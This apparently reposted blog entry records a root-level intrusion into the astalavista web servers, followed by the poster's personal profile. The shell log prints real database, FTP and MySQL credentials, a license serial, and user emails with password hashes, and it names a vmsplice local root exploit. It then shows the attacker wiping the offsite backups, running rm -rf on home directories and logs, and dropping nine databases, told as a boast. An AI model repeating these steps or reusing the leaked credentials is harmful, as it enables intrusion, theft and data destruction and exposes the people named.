-rw-------  1 root root         35 Jun  2 14:23 .lesshst

drwxr-xr-x  2 root root       4096 Dec 29  2007 .lftp

drwxr-xr-x 10 root root       4096 Sep 14  2007 linux-2.6.19.2-grsec

-rw-r--r--  1 root root   94979336 Feb 16  2007 linux-2.6.19.2-grsec.tar.gz

-rw-r--r--  1 root root    4737058 Sep 22  2007 linux-2.6.22.tar.bz2

-rwx------  1 root root        760 Sep 18  2008 lp

drwxr-xr-x 12 root root       4096 Nov 30  2007 lsws-3.3.1

-rw-r--r--  1 root root    2480045 Nov 30  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz

-rw-r--r--  1 root root    6388501 Nov 29  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1

drwxr-xr-x 12 root root       4096 Mar 21  2008 lsws-3.3.9

-rw-r--r--  1 root root    6437577 Mar 21  2008 lsws-3.3.9-ent-x86_64-linux.tar.gz

drwxr-xr-x 12 root root       4096 May 29 15:10 lsws-4.0.3

-rw-r--r--  1 root root    6496050 May  8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz

-rw-r--r--  1 root root      25316 Feb 15  2006 mybk.sh

-rw-------  1 root root         41 Oct 19  2007 .my.cnf

-rw-------  1 root root       2902 Jun  4 08:40 .mysql_history

-rwx------  1 root root      38873 Apr 16  2008 mysqlreport

-rw-------  1 root root         41 May 20  2008 .mytop

drwxr-xr-x  3 1000  1000      4096 May 20  2008 mytop-1.6

-rw-r--r--  1 root root      19720 Feb 17  2007 mytop-1.6.tar.gz

drwxr-xr-x  2 root root       4096 Oct 28  2007 .ncftp

-rw-------  1 root root       1462 Sep 21  2007 opt.php

-rw-r--r--  1 root root       3371 Sep 22  2007 p

-rw-r--r--  1 root root    7608429 Aug 30  2007 php-5.2.4.tar.bz2

-rw-------  1 root root       1024 Feb  3 21:32 .rnd

-rw-r--r--  1 root root        716 Nov 28  2007 server.csr

-rw-r--r--  1 root root        887 Nov 28  2007 server.key

drwx------  2 root root       4096 Oct 10  2008 .ssh

-rw-r--r--  1 root root      44227 Oct 28  2007 tar-inc-backup.dat

-rw-r--r--  1 root root        129 Jan  6  2007 .tcshrc

-rw-r--r--  1 root root  104874307 Oct 17  2007 test100.zip

-rw-r--r--  1 root root   67085540 Oct 19  2007 test100.zip.1

drwxr-xr-x  2 root root       4096 Apr 29 11:15 tmp

-rw-r--r--  1 root root      42596 May 21  2007 tuning-primer.sh

drwxrwxrwx 19 1000 users      4096 Mar 21  2008 valgrind-3.3.0

-rw-r--r--  1 root root    4519551 Dec 11  2007 valgrind-3.3.0.tar.bz2

-rw-------  1 root root      12997 May 16  2008 .viminfo



sh-3.2# cat .bash_history

[snip]

wget cp4sst.com/sstlinux.tar.gz

tar zxvf sstlinux.tar.gz

cd linux-2.6.27.10

sh install.sh

make bzImage ; make modules ; make modules_install ; make install

make clean

service mysqld restart

[snip]

cd /usr/sbin/

chmod 4777 traceroute

chmod 4777 ping

traceroute -I www.astalavista.ch

[snip]

vi /etc/csf/csf.conf

traceroute google.ch

service csf restart

tracert google.ch

service csf restart

traceroute www.google.ch

tracert www.google.ch

traceroute www.google.ch

locate traceroute

chown 4755 /bin/traceroute

chown 4777 /bin/traceroute

locate ping

chown 4755 /bin/ping

chown 4777 /bin/ping

cd /bin/

ls -ali | grep ping

chown root ping

chmod 4755 ping

ls -ali | grep traceroute

chown root traceroute

chmod 4755 traceroute

ls -ali | grep traceroute

traceroute -I www.google.ch

traceroute www.google.ch

whois pmsantos.ch

[snip]

mysql -h com_contrexx2_live < /root/defaultp_ports.sql

mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql

mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql

mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql

top

ping ssth.ch

ping asdlkfaljgasd???ljg???lasj.ch

ping asdlkfaljgasdlasj.ch

ping www.ssth.ch

ping ssth.ch

nslookup www.google.ch

nslookup www.ssth.ch

man nslookup

ping www.google.ch

nslookup www.google.ch

nslookup www.google.ch

nslookup salfjasdlf.ch

[snip]

openssl passwd -1 sadf

openssl passwd -1 5cZNHstdTy

mysql

mysql

locate proftp

vi /etc/proftpd.passwd

service proftpd restart

locate proftpd.conf

vi /etc/proftpd.conf

vi /etc/proftpd.passwd

service proftpd restart

[snip]

/bin/sh /home/com/backup_system/backup.sh

tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin

mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql

mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql

ls -ali

mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql

mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql

crontab -l

crontab -l

php -q /home/com/public_html/modifications/cronjobs/securitynews.php

/home/com/public_html/modifications/cronjobs/exploits.sh

wget http://www.litespeedtech.com/packages/4.0/lsws-4.0.3-ent-x86_64-linux.tar.gz

tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz

cd lsws-4.0.3

sh install.sh

uptime

hdparm -tt /dev/sda

iostat

yum install iostat

iostat

whereis iostat

yjm clean all

yum clean all ; yum -y update

iostat

yum install systat

rpm -qa | grep iostat

rpm -qa | grep sysstat

rpm -qa | grep systat

dmesg -c

sysctl -p

uname -r

cd /usr/src

wget nix101.com/kernels/sstlinux.tar.gz

shutdown -r now

nano -w /boot/grub/grub.conf



sh-3.2# cat .my.cnf

[client]

user=da_admin

password=X9dctmRH



sh-3.2# cat /home/com/backup_system/backup.sh

#!/bin/sh

##########################################################

#                                                        #

#   incremental backup for astalavista.com               #

#                                                        #

# author: Paulo M. Santos  #

#                                                        #

##########################################################

[snip]

PROG_DIR="/home/com/backup_system";

BACKUP_DIR="/home/com/backups";

DOBACKUP_FROM="/home/com/domains/astalavista.com/public_html";

# ftp for synology backup server

FTP_HOST="212.254.194.163";

FTP_PORT="21";

FTP_USER="astalavista.com";

FTP_PASS="yWHOJbzpWTWC6Xrmg1WnfBk5V";

FTP_DIR="/astalavista.com";

# database

DB_HOST="localhost";

DB_USER="contrexxuser2";

DB_PASS="0fEYNZgXz1pKe";

DB_DATABASE1="com_contrexx2_live";

DB_DATABASE2="com_contrexx2";

[snip]

ftp -in $FTP_HOST $FTP_PORT <quote USER $FTP_USER

quote PASS $FTP_PASS

cd $FTP_DIR

put $DB_FULLNAME-SQL_Dump.tar

put $BACKUP_FULLNAME-Public_HTML.tar

close

bye

EOF



sh-3.2# cd /home

sh-3.2# ls -la

total 120

drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .

drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..

drwx--x--x  9 admin   admin    4096 Nov 28  2007 admin

-rw-------  1 root    root     8192 Jun  4 03:03 aquota.group

-rw-------  1 root    root     8192 Jun  3 02:45 aquota.user

drwx--x--x  6 astanet astanet  4096 Jun  4 09:51 astanet

drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup

drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161

drwx--x--x 10 com     com      4096 Apr 28 12:40 com

drwxr-xr-x  2 root    root     4096 May 17  2007 ftp

drwx------  3 jon     jon      4096 Sep 21  2007 jon

drwx------  2 root    root    16384 Sep 11  2007 lost+found

drwxr-xr-x  2 root    root     4096 Sep 14  2007 my

drwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata

drwx------  2 jon     jon      4096 Sep 15  2007 test

drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp



sh-3.2# cd admin

sh-3.2# ls -la

total 1735896

drwx--x--x  9 admin admin       4096 Nov 28  2007 .

drwxr-xr-x 14 root  root        4096 Mar 11 17:56 ..

drwxrwxr-x  2 admin admin       4096 Oct 25  2007 admin_backups

drwx------  2 admin admin       4096 Sep 28  2007 backups

-rw-------  1 admin admin        860 Sep 17  2008 .bash_history

-rw-r--r--  1 admin admin         24 Sep 14  2007 .bash_logout

-rw-r--r--  1 admin admin        176 Sep 14  2007 .bash_profile

-rw-r--r--  1 admin admin        124 Sep 14  2007 .bashrc

drwxr-xr-x  2 root  root        4096 Sep 28  2007 com_backups

drwx--x--x  6 admin admin       4096 Sep 21  2007 domains

drwxrwx---  3 admin mail        4096 Sep 21  2007 imap

-rw-r--r--  1 root  root          24 Sep 21  2007 info.php

drwx------  2 admin admin       4096 Sep 21  2007 mail

-rw-r--r--  1 root  root         716 Nov 28  2007 server.csr

-rw-r--r--  1 root  root         887 Nov 28  2007 server.key

-rw-r-----  1 admin mail          34 Sep 14  2007 .shadow

-rw-r-----  1 admin com   1775711054 Oct 25  2007 user.admin.com.tar.gz

drwx--x--x  2 admin admin       4096 Jul 29  2008 user_backups



sh-3.2# ..

sh-3.2# cd jon

sh-3.2# ls -la

total 36

drwx------  3 jon  jon  4096 Sep 21  2007 .

drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..

-rw-------  1 jon  jon    53 Sep 21  2007 .bash_history

-rw-r--r--  1 jon  jon    24 Sep 21  2007 .bash_logout

-rw-r--r--  1 jon  jon   176 Sep 21  2007 .bash_profile

-rw-r--r--  1 jon  jon   124 Sep 21  2007 .bashrc

-rw-r--r--  1 root root   24 Sep 21  2007 info.php

drwxrwxr-x  2 jon  jon  4096 Sep 21  2007 public_html



sh-3.2# cd ..

sh-3.2# cd test

sh-3.2# ls -la

total 48

drwx------  2 jon  jon  4096 Sep 15  2007 .

drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..

-rw-------  1 jon  jon    79 Sep 21  2007 .bash_history

-rw-r--r--  1 jon  jon    24 Sep 15  2007 .bash_logout

-rw-r--r--  1 jon  jon   176 Sep 15  2007 .bash_profile

-rw-r--r--  1 jon  jon   124 Sep 15  2007 .bashrc

sh-3.2# cat .bash_history

/usr/bin/mysqladmin -u root password PoliuJhytg67



sh-3.2# cd ..

sh-3.2# cd astanet

sh-3.2# ls -la

total 52

drwx--x--x  6 astanet astanet 4096 Jun  4 09:51 .

drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..

drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth

-rw-------  1 astanet astanet 3892 Apr 16 12:14 .bash_history

-rw-r--r--  1 astanet astanet   33 Dec 17 21:50 .bash_logout

-rw-r--r--  1 astanet astanet  176 Dec 17 21:50 .bash_profile

-rw-r--r--  1 astanet astanet  124 Dec 17 21:50 .bashrc

drwx--x--x  3 astanet astanet 4096 Dec 23 12:18 domains

drwxrwx---  3 astanet mail    4096 Dec 23 12:18 imap

drwx------  2 astanet astanet 4096 Dec 23 12:18 mail

-rw-------  1 astanet astanet  197 Jun  4 09:51 .mysql_history

lrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html

-rw-r-----  1 astanet mail      34 Dec 22 12:41 .shadow



sh-3.2# cd auth/

sh-3.2# ls -la

total 28

drwxr-xr-x 2 root    root    4096 Dec 23 16:00 .

drwx--x--x 6 astanet astanet 4096 Jun  4 09:51 ..

-rw-r--r-- 1 root    root     321 Jan  5  2006 hackercontest.config.inc.php

-rw-r--r-- 1 root    root     319 Jan  5  2006 hosting.config.inc.php

-rw-r--r-- 1 root    root      24 Jun  4 09:38 .htadm_pwd

-rw-r--r-- 1 root    root      49 Jan  5  2006 .htpasswd_newhosting

-rw-r--r-- 1 root    root      51 Oct 11  2006 .htwebalizer_pwd



sh-3.2# cat hackercontest.config.inc.php

// Variabeln f?r Verbindung zur Datenbank //

$conxHost = 'localhost';                       // MySQL hostname

$conxUser = 'hackercontest';                                       // MySQL user

$conxPassword = 'K6m@7dUc';                    // MySQL password

$bfkey = 'cXvB3981';                                       // Encryption/Decryption Key for Blowfish

?>

sh-3.2# cat hosting.config.inc.php

// Variabeln f?r Verbindung zur Datenbank //

$conxHost = 'localhost';                       // MySQL hostname

$conxUser = 'hostinguser';                                 // MySQL user

$conxPassword = 'cXvB3981';                    // MySQL password

$bfkey = 'cXvB3981';                                       // Encryption/Decryption Key for Blowfish

?>



sh-3.2# cd ..

sh-3.2# cd com

sh-3.2# ls -la

total 141208

drwx--x--x 10 com  com       4096 Apr 28 12:40 .

drwxr-xr-x 14 root root      4096 Mar 11 17:56 ..

drwx------  2 com  com       4096 Jun  4 04:04 backups

-rw-r--r--  1 root root   2419504 Sep 28  2007 backup.sql

drwxr-xr-x  2 com  com       4096 May 12 15:20 backup_system

-rw-------  1 com  com      21880 Jun  2 08:07 .bash_history

-rw-r--r--  1 com  com         24 Sep 24  2007 .bash_logout

-rw-r--r--  1 com  com        176 Sep 24  2007 .bash_profile

-rw-r--r--  1 com  com        124 Sep 24  2007 .bashrc

drwx--x--x  3 com  com       4096 Jan 29  2008 domains

-rw-r--r--  1 com  com      16409 Jul 16  2008 FWUser.class.php.fixed

drwxrwx---  3 com  mail      4096 Jan  6 19:24 imap

-rw-------  1 com  com         69 Nov 18  2008 .lesshst

drwx------  2 com  com       4096 Sep 24  2007 mail

-rw-------  1 com  com      13970 Mar 28 21:42 .mysql_history

drwxr-xr-x  2 com  com       4096 Aug 20  2008 .ncftp

lrwxrwxrwx  1 com  com         37 Sep 24  2007 public_html -> ./domains/astalavista.com/public_html

-rw-r-----  1 com  mail        34 Sep 24  2007 .shadow

drwx------  2 com  com       4096 Aug 26  2008 .ssh

-rwx------  1 com  com       8515 Feb 10  2008 t

-rw-rw-r--  1 com  com       6265 Feb 11  2008 t.c

drwxrwxr-x  2 com  com       4096 Jan 30 15:47 tmp

-rw-rw-r--  1 com  com        617 May 20  2008 .toprc

-rw-rw-r--  1 com  com  141851766 May 19  2008 version2-backup-20080519-0900.sql

-rw-------  1 com  com      16629 Mar 28 21:46 .viminfo

-rw-rw-r--  1 com  com         51 Aug 25  2008 .vimrc



sh-3.2# head t.c

/*

 * jessica_biel_naked_in_my_bed.c

 *

 * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.

 * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.

 * Stejnak je to stare jak cyp a aj jakesyk rozbite.

 *

 * Linux vmsplice Local Root Exploit

 * By qaaz

 *



sh-3.2# cd /

sh-3.2# ls -la

total 360

drwxr-xr-x  25 root root   4096 Jun  3 02:43 .

drwxr-xr-x  25 root root   4096 Jun  3 02:43 ..

-rw-------   1 root root  10240 Jun  3 02:39 aquota.group

-rw-------   1 root root  10240 Jun  3 02:39 aquota.user

-rw-r-----   1 root root    819 Jul 17  2008 astalavista.us.db

-rw-r--r--   1 root root      0 Jun  3 02:43 .autofsck

-rw-r--r--   1 root root      0 Sep 16  2007 .autorelabel

drwxr-xr-x   3 root root   4096 Dec 29  2007 backup

drwxr-xr-x   2 root root   4096 Jun  4 04:03 bin

drwxr-xr-x   5 root root   4096 Jun  2 14:06 boot

drwxr-xr-x  11 root root   3620 Jun  3 02:43 dev

drwxr-xr-x  84 root root  12288 Jun  4 03:16 etc

drwxr-xr-x  14 root root   4096 Mar 11 17:56 home

-rw-r--r--   1 root root  13387 Mar 20  2008 httpd.conf

drwxr-xr-x  11 root root   4096 Jun  4 04:02 lib

drwxr-xr-x   7 root root   4096 Jun  4 04:03 lib64

drwx------   2 root root  16384 Sep 11  2007 lost+found

drwxr-xr-x   2 root root   4096 Mar 11 17:56 media

drwxr-xr-x   2 root root      0 Jun  3 02:43 misc

drwxr-xr-x   2 root root   4096 Mar 11 17:56 mnt

-rw-r--r--   1 root root   5859 Feb  3  2008 mrtg.cfg

drwxr-xr-x   2 root root      0 Jun  3 02:43 net

drwxr-xr-x   3 root root   4096 Mar 11 17:56 opt

dr-xr-xr-x 264 root root      0 Jun  3 02:42 proc

drwxr-x---  15 root root   4096 Jun  4 08:40 root

drwxr-xr-x   2 root root  12288 Jun  4 04:03 sbin

drwxr-xr-x   2 root root   4096 Mar 11 17:56 selinux

drwxr-xr-x   2 root root   4096 Mar 11 17:56 srv

drwxr-xr-x  11 root root      0 Jun  3 02:42 sys

drwxrwxrwt   4 root root 122880 Jun  4 10:35 tmp

drwxr-xr-x  16 root root   4096 Jun  2 13:56 usr

drwxr-xr-x  26 root root   4096 Jun  4 03:16 var



sh-3.2# cd opt

sh-3.2# ls -la

total 20

drwxr-xr-x  3 root root 4096 Mar 11 17:56 .

drwxr-xr-x 25 root root 4096 Jun  3 02:43 ..

drwxr-xr-x 15 root root 4096 Mar 20  2008 lsws



sh-3.2# cd lsws/

sh-3.2# ls -la

total 108

drwxr-xr-x 15 root   root    4096 Mar 20  2008 .

drwxr-xr-x  3 root   root    4096 Mar 11 17:56 ..

drwxr-xr-x  8 root   root    4096 Mar 20  2008 add-ons

drwxr-xr-x 13 root   root    4096 May 29 15:10 admin

drwxr-xr-x  5 apache apache  4096 May 29 15:10 autoupdate

drwxr-xr-x  2 root   root    4096 May 29 15:10 bin

drwx------  4 apache apache  4096 Jun  3 02:43 conf

drwxr-xr-x  7 apache apache  4096 Mar 20  2008 DEFAULT

drwxr-xr-x  2 root   root    4096 Sep 15  2008 docs

drwxr-xr-x  2 root   root    4096 May 29 15:10 fcgi-bin

drwxr-xr-x  2 root   root    4096 Sep 15  2008 lib

-rw-r--r--  1 root   root    6959 May 29 15:10 LICENSE

-rw-r--r--  1 root   root    2214 May 29 15:10 LICENSE.OpenLDAP

-rw-r--r--  1 root   root    6279 May 29 15:10 LICENSE.OpenSSL

-rw-r--r--  1 root   root    3208 May 29 15:10 LICENSE.PHP

drwxr-xr-x  2 root   root   20480 Jun  4 09:55 logs

drwxr-xr-x  2 root   root    4096 Mar 20  2008 php

drwx------  2 apache apache  4096 Mar 20  2008 phpbuild

drwxr-xr-x  3 root   root    4096 Mar 20  2008 share

-rw-r--r--  1 root   root       6 May 29 15:10 VERSION



sh-3.2# cd conf

sh-3.2# ls -la

total 48

drwx------  4 apache apache 4096 Jun  3 02:43 .

drwxr-xr-x 15 root   root   4096 Mar 20  2008 ..

drwx------  2 apache apache 4096 Mar 20  2008 cert

-rw-r--r--  1 apache apache 6668 May 29 15:13 httpd_config.xml

-rw-------  1 apache apache 6613 May 27 18:33 httpd_config.xml.bak

-rw-r--r--  1 root   apache    0 Jun  3 14:11 .last

-rw-------  1 apache apache  256 May 29 15:10 license.key

-rw-------  1 apache apache  256 Mar 21  2008 license.key.old

-rw-------  1 apache apache 3320 Mar 20  2008 mime.properties

-rw-------  1 apache apache   20 May 29 15:10 serial.no

drwx------  2 apache apache 4096 Mar 20  2008 templates



sh-3.2# cat serial.no

IbDl-oVsO-CKqL-wVRa



sh-3.2# mysql

Welcome to the MySQL monitor.  Commands end with ; or \g.

Your MySQL connection id is 286844

Server version: 5.0.45-community-log MySQL Community Edition (GPL)



Type 'help;' or '\h' for help. Type '\c' to clear the buffer.



mysql> show databases;

+-----------------------+

| Database              |

+-----------------------+

| information_schema    |

| astanet_ads           |

| astanet_mailing_lists |

| astanet_mediawiki     |

| astanet_membersystem  |

| com_contrexx          |

| com_contrexx2         |

| com_contrexx2_live    |

| da_roundcube          |

| dolphin               |

| ideapool              |

| mysql                 |

| test                  |

| yourmaster            |

+-----------------------+

14 rows in set (0.00 sec)



mysql> use ideapool

Database changed

mysql> show tables;

+-----------------------------------+

| Tables_in_ideapool                |

+-----------------------------------+

| eventum_columns_to_display        |

| eventum_custom_field              |

| eventum_custom_field_option       |

| eventum_custom_filter             |

| eventum_customer_account_manager  |

| eventum_customer_note             |

| eventum_email_account             |

| eventum_email_draft               |

| eventum_email_draft_recipient     |

| eventum_email_response            |

| eventum_faq                       |

| eventum_faq_support_level         |

| eventum_group                     |

| eventum_history_type              |

| eventum_irc_notice                |

| eventum_issue                     |

| eventum_issue_association         |

| eventum_issue_attachment          |

| eventum_issue_attachment_file     |

| eventum_issue_checkin             |

| eventum_issue_custom_field        |

| eventum_issue_history             |

| eventum_issue_quarantine          |

| eventum_issue_requirement         |

| eventum_issue_user                |

| eventum_issue_user_replier        |

| eventum_link_filter               |

| eventum_mail_queue                |

| eventum_mail_queue_log            |

| eventum_news                      |

| eventum_note                      |

| eventum_phone_support             |

| eventum_project                   |

| eventum_project_category          |

| eventum_project_custom_field      |

| eventum_project_email_response    |

| eventum_project_field_display     |

| eventum_project_group             |

| eventum_project_link_filter       |

| eventum_project_news              |

| eventum_project_phone_category    |

| eventum_project_priority          |

| eventum_project_release           |

| eventum_project_round_robin       |

| eventum_project_status            |

| eventum_project_status_date       |

| eventum_project_user              |

| eventum_reminder_action           |

| eventum_reminder_action_list      |

| eventum_reminder_action_type      |

| eventum_reminder_field            |

| eventum_reminder_history          |

| eventum_reminder_level            |

| eventum_reminder_level_condition  |

| eventum_reminder_operator         |

| eventum_reminder_priority         |

| eventum_reminder_requirement      |

| eventum_reminder_triggered_action |

| eventum_resolution                |

| eventum_round_robin_user          |

| eventum_search_profile            |

| eventum_status                    |

| eventum_subscription              |

| eventum_subscription_type         |

| eventum_support_email             |

| eventum_support_email_body        |

| eventum_time_tracking             |

| eventum_time_tracking_category    |

| eventum_user                      |

+-----------------------------------+

69 rows in set (0.00 sec)



mysql> describe eventum_user;

+-------------------------+------------------+------+-----+---------------------+----------------+

| Field                   | Type             | Null | Key | Default             | Extra          |

+-------------------------+------------------+------+-----+---------------------+----------------+

| usr_id                  | int(11) unsigned | NO   | PRI | NULL                | auto_increment |

| usr_grp_id              | int(11) unsigned | YES  | MUL | NULL                |                |

| usr_customer_id         | int(11) unsigned | YES  |     | NULL                |                |

| usr_customer_contact_id | int(11) unsigned | YES  |     | NULL                |                |

| usr_created_date        | datetime         | NO   |     | 0000-00-00 00:00:00 |                |

| usr_status              | varchar(8)       | NO   |     | active              |                |

| usr_password            | varchar(32)      | NO   |     |                     |                |

| usr_full_name           | varchar(255)     | NO   |     |                     |                |

| usr_email               | varchar(255)     | NO   | UNI |                     |                |

| usr_preferences         | longtext         | YES  |     | NULL                |                |

| usr_sms_email           | varchar(255)     | YES  |     | NULL                |                |

| usr_clocked_in          | tinyint(1)       | YES  |     | 0                   |                |

| usr_lang                | varchar(5)       | YES  |     | NULL                |                |

+-------------------------+------------------+------+-----+---------------------+----------------+

13 rows in set (0.00 sec)



mysql> select usr_full_name,usr_email,usr_password from eventum_user;

+----------------------+-------------------------------+----------------------------------+

| usr_full_name        | usr_email                     | usr_password                     |

+----------------------+-------------------------------+----------------------------------+

| system               | system-account@example.com    | 14589714398751513457adf349173434 |

| Developer (Paulo)    | paulo.santos@astalavista.ch   | 26a35a1cf8895c27fb37ef4cf149f7bb |

| Be1er0ph0r           | be1er0ph0r@gmx.de             | 229766dc0ca1fb67160a8782321dfdce |

| Admin                | pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |

| ADMIN                | admin@astalavista.ch          | f6fdffe48c908deb0f4c3bd36c032e72 |

| USER                 | user@astalavista.ch           | 5cc32e366c87c4cb49e4309b75f57d64 |

| Glafkos - (nowayout) | glafkos@astalavista.com       | f7735ab119023a8abb2301e67f81cd67 |

| Joao                 | joao.pontes@astalavista.net   | f805c071d7c823b937448c54c047b9fd |

| Pascal               | pm@astalavista.ch             | e10adc3949ba59abbe56e057f20f883e |

| commander            | commander@astalavista.com     | 932cd250918f881d41feb0b93883a926 |

| ishtus               | ishtus@astalavista.com        | a587ffc88b3dbbba3fd2fe67af649ff0 |

| sykadul              | sykadul@astalavista.com       | 20224a2f3eeb57a13a10b4df543c128e |

| Zach McElroy         | admin@badfoo.net              | 33c5d4954da881814420f3ba39772644 |

| usb                  | usbenigma@hushmail.com        | b513f22c3db6932855ad732f5f8a10a2 |

| cyph3r               | cyph3r@astalavista.com        | 6e1e50017a945e874d52ec91f9ab2cee |

+----------------------+-------------------------------+----------------------------------+

15 rows in set (0.00 sec)



mysql> exit

Bye





sh-3.2# ftp 212.254.194.163

Connected to 212.254.194.163.

220 BackupCOM_VW FTP server ready.

504 AUTH: security mechanism 'GSSAPI' not supported.

504 AUTH: security mechanism 'KERBEROS_V4' not supported.

KERBEROS_V4 rejected as an authentication type

Name (212.254.194.163:root): astalavista.com

331 Password required for astalavista.com.

Password:

230 User astalavista.com logged in.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> ls -la

227 Entering Passive Mode (212,254,194,163,2,188)

150 Opening BINARY mode data connection for 'file list'.

dr-x------   1 root users         4096 Jun  4 06:13 astalavista.com

226 Transfer complete.

ftp> cd astalavista.com

250 CWD command successful.

ftp> ls -la

227 Entering Passive Mode (212,254,194,163,2,189)

150 Opening BINARY mode data connection for 'file list'.

-rw-rw-rw-   1 astalavista.com users     23410936878 Apr 29 22:10 09-04-28-astacom_full.tar

-rw-rw-rw-   1 astalavista.com users     20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2

-rw-rw-rw-   1 astalavista.com users        88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2

-rw-rw-rw-   1 astalavista.com users     26413034040 May  2 00:21 09-05-01-astacom-Public_HTML.tar

-rw-rw-rw-   1 astalavista.com users       277843549 May  1 17:29 09-05-01-astacom-SQL_Dump.tar

[snip]

226 Transfer complete.

ftp> mdelete *

ftp> ls -la

227 Entering Passive Mode (212,254,194,163,2,193)

150 Opening BINARY mode data connection for 'file list'.

226 Transfer complete.

ftp>



sh-3.2# cd /home

sh-3.2# ls -la

total 120

drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .

drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..

drwx--x--x  9 admin   admin    4096 Nov 28  2007 admin

-rw-------  1 root    root     8192 Jun  4 03:03 aquota.group

-rw-------  1 root    root     8192 Jun  3 02:45 aquota.user

drwx--x--x  6 astanet astanet  4096 Jun  4 09:51 astanet

drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup

drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161

drwx--x--x 10 com     com      4096 Apr 28 12:40 com

drwxr-xr-x  2 root    root     4096 May 17  2007 ftp

drwx------  3 jon     jon      4096 Sep 21  2007 jon

drwx------  2 root    root    16384 Sep 11  2007 lost+found

drwxr-xr-x  2 root    root     4096 Sep 14  2007 my

drwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata

drwx------  2 jon     jon      4096 Sep 15  2007 test

drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp



sh-3.2# rm -rf backup/

sh-3.2# rm -rf backup.14161/

sh-3.2# rm -rf ftp/

sh-3.2# rm -rf jon/

sh-3.2# rm -rf my/

sh-3.2# rm -rf mysqldata/

sh-3.2# rm -rf test/

sh-3.2# rm -rf tmp/

sh-3.2# cd ~

sh-3.2# rm -rf *

sh-3.2# rm -rf /var/log/

rm: cannot remove directory `/var/log//proftpd': Directory not empty

sh-3.2# rm -rf /home/*

sh-3.2# mysql

Welcome to the MySQL monitor.  Commands end with ; or \g.

Your MySQL connection id is 407156

Server version: 5.0.45-community-log MySQL Community Edition (GPL)



Type 'help;' or '\h' for help. Type '\c' to clear the buffer.



mysql> show databases;

+-----------------------+

| Database              |

+-----------------------+

| information_schema    |

| astanet_ads           |

| astanet_mailing_lists |

| astanet_mediawiki     |

| astanet_membersystem  |

| com_contrexx          |

| com_contrexx2         |

| com_contrexx2_live    |

| da_roundcube          |

| dolphin               |

| ideapool              |

| mysql                 |

| test                  |

| yourmaster            |

+-----------------------+

14 rows in set (0.03 sec)



mysql> drop database astanet_membersystem;

droQuery OK, 46 rows affected (0.81 sec)



mysql> drop database com_contrexx;

Query OK, 211 rows affected (2.72 sec)



mysql> drop database com_contrexx2;

Query OK, 237 rows affected (2.23 sec)



mysql> drop database com_contrexx2_live;

Query OK, 227 rows affected (7.63 sec)



mysql> drop database ideapool;

Query OK, 69 rows affected (0.19 sec)



mysql> drop database yourmaster;

Query OK, 158 rows affected (0.55 sec)



mysql> drop database astanet_ads;

Query OK, 9 rows affected (0.11 sec)



mysql> drop database astanet_mailing_lists;

Query OK, 24 rows affected (1.47 sec)



mysql> drop database astanet_mediawiki;

Query OK, 31 rows affected (0.51 sec)



mysql> show databases;

+--------------------+

| Database           |

+--------------------+

| information_schema |

| da_roundcube       |

| dolphin            |

| mysql              |

| test               |

+--------------------+

5 rows in set (0.00 sec)



=============================================================





dalam kasus ini terbukti bahwa di atas langit masih ada langit 

yang perlu kita ingat hanya itu ..







REGARD 



ELV1N4

Labels: Catatan Si Vina Newbie


On 8/10/09 at 

9:17 PM





      



My Profile:

      
      


        SIMPLE GIRLS not much act like dirty hookers.. love rock n roll love pizza to say.... i lied thats not all i have to say im from Bandung 
I like sitting on the front steps chewing tabacco and spitting it into my nice steel bucket. 
I also like stroking my musket... if you know what i mean. And to top it off... I have one of the prettiest boyfriends in the whole world he has six of the nicest teeth ive ever seen in my life.haha i couldnt help it ......, i just thought of you being so white trash and it came to me


Biography:

Name : elvina putri ariyani
Origin : I’m Half Asian. My dad is dutch and my mom is indonesian
age : 25 xP
sex : female
address : secret
homepage: http://www.elv1n4.serverisdown.org
email : elvina@doyan.cc
msn : elv1n4@indohackerlink.com
Jobs : nothing
Foods : Bakwan, pizza, mie baso ceker,
Drinks : vodka, cool beer, hot chocho milk
Colors : black,blue
Books : all about networking, hitam putih indonesia.
activity: n0thin9 special
music : pop punk, techo metal, trash, pop.
place : comodo island, beach, kuta , etc
contact : 0856***31337
interest: finding friend, and networking
fav auth: mike antisec, str0ke, arief sakitjiwa, micheldraw, bill gates
fav chan: #mainhack #hitamputih, #nyubicrew ,#binushacker, #Airsoul , #cyberlink , #powhack , #papmahackerlink , #CCPOWER , #LULZSEC etc
fav link: google



short story:

